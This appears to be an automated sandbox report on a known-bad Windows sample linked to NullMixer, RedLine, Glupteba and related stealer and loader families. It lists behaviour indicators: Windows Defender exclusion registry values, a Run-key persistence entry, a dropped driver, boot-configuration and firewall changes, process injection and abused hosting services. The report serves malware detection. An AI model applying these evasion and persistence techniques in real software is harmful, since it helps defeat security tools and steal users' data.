Analysis Overview
SHA256
e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd
Threat Level: Known bad
The file e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd was found to be: Known bad.
Malicious Activity Summary
Fabookie
Fabookie family
Glupteba
RedLine
Socelars payload
NullMixer
Redline family
Socelars family
Glupteba family
PrivateLoader
RedLine payload
Detect Fabookie payload
Nullmixer family
Windows security bypass
Socelars
Privateloader family
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
Executes dropped EXE
ASPack v2.12-2.42
Checks installed software on the system
Manipulates WinMon driver.
Looks up external IP address via web service
Manipulates WinMonFS driver.
Legitimate hosting services abused for malware hosting/C2
Looks up geolocation information via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: LoadsDriver
Scheduled Task/Job: Scheduled Task
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-06 10:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 10:40
Reported
2024-11-06 10:43
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\QuietDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2016 set thread context of 2132 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe |
| PID 1508 set thread context of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe |
| PID 804 set thread context of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\gimagex.exe | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-UTKGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259448320 | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.sfx.exe | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-LI9U0.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-QDMNL.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Gparted\Build.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\gimagex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
